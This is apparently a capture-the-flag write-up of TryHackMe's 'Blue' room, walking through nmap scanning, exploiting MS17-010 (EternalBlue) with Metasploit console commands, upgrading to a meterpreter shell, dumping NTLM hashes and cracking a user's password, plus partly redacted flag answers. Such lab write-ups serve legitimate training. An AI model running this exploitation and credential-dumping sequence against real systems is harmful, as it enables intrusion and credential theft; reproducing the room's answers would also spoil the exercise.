TryHackMe - Blue

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

Intro

The next room in TryHackMe’s OSCP path. Make sure to check out TryHackMe!


Blue Writeup

[Task 1] Recon

First, I ran an nmap scan on the box with the command nmap -A -sC -sV <IP>. This runs a more aggressive scan that gives more information. scan

The scan reveals 9 open ports, but only 3 of them are open below 1000. Looking at the scan, we see SMB running. This, along with the fact that one of the tags for the box is “eternalblue”, makes me think that this box could possibly be vulnerable to EternalBlue. EternalBlue is an exploit developed by the NSA and leaked by the Shadow Brokers hacker group and exploits a vulnerability in how Microsoft implemented SMB.

To see if the box is actually vulnerable to EternalBlue, I ran the nmap scan again, with the new argument --script safe, to have nmap try to run some exploits on the box.

eternalblue

The relevant information from the 2nd nmap scan is shown above. From this, we can see that the box is indeed vulnerable to EternalBlue, or ms17-010.

Question: How many ports are open with a port number under 1000?

Answer: 3

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: ms17-010

[Task 2] Gain Access

To exploit this vulnerability, I used Metasploit. First, open up msfconsole, and run the following commands to setup and run the exploit.

[email protected]~/ msfconsole
msf5> use exploit/windows/smb/ms17_010_eternalblue
msf5> show targets
msf5> set TARGET 0
msf5> show options
msf5> set RHOST <IP>
msf5> exploit

This will select the EternalBlue exploit from Metasploit’s list of exploits, and aim it at our target box.

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOST

[Task 3] Escalate

In the terminal that has run the exploit, background it by doing CTRL+Z. Now, we will attempt to use our exploit to gain meterpreter access. We will be using the post/multi/manage/shell_to_meterpreter exploit to upgrade our shell. We will need to find our active session and provide it as an option to the new exploit.

msf5> use post/multi/manage/shell_to_meterpreter
msf5> show options
msf5> sessions -l
msf5> set SESSION 1
msf5> exploit

Once this is done, we need to interact with our new session.

msf5> sessions -l
msf5> sessions -i 2

With this, we now have meterpreter shell access to the box! We follow the next steps of the task, and switch our migrate our process to make sure our process is system.

meterpreter > ps
meterpreter > 2856

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit.

What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

Question: Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

Answer: SESSION

[Task 4] Cracking

Now, we need to crack some passwords. Running the command hashdump gives us the following output: hashdump

From this, we see the name of the non-default user is Jon.

Unfortunately, these aren’t plaintext passwords, but NTLM hashes. However, they might be able to be cracked. A good program to use for this is John the Ripper, but I first wanted to check some online utilities. Going to https://crackstation.net/ and putting in the correct section of Jon’s dumped hash gives me his password.

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.

What is the name of the non-default user?

Answer: Jon

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: al...

[Task 5] Find flags!

Now that we have access, we need to find the flags.

I found the first flag from reading the flag1.txt file located in the root of the C:/ drive. I found the second flag by looking for local user account passwords, and it was located in C:\windows\system32\config. The final flag was found in Jon’s Documents folder.

Question: Flag1? (Only submit the flag contents {CONTENTS})

Answer: access_...

Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

Answer: sam_...

Question: flag3?

Answer: admin_...



comments powered by Disqus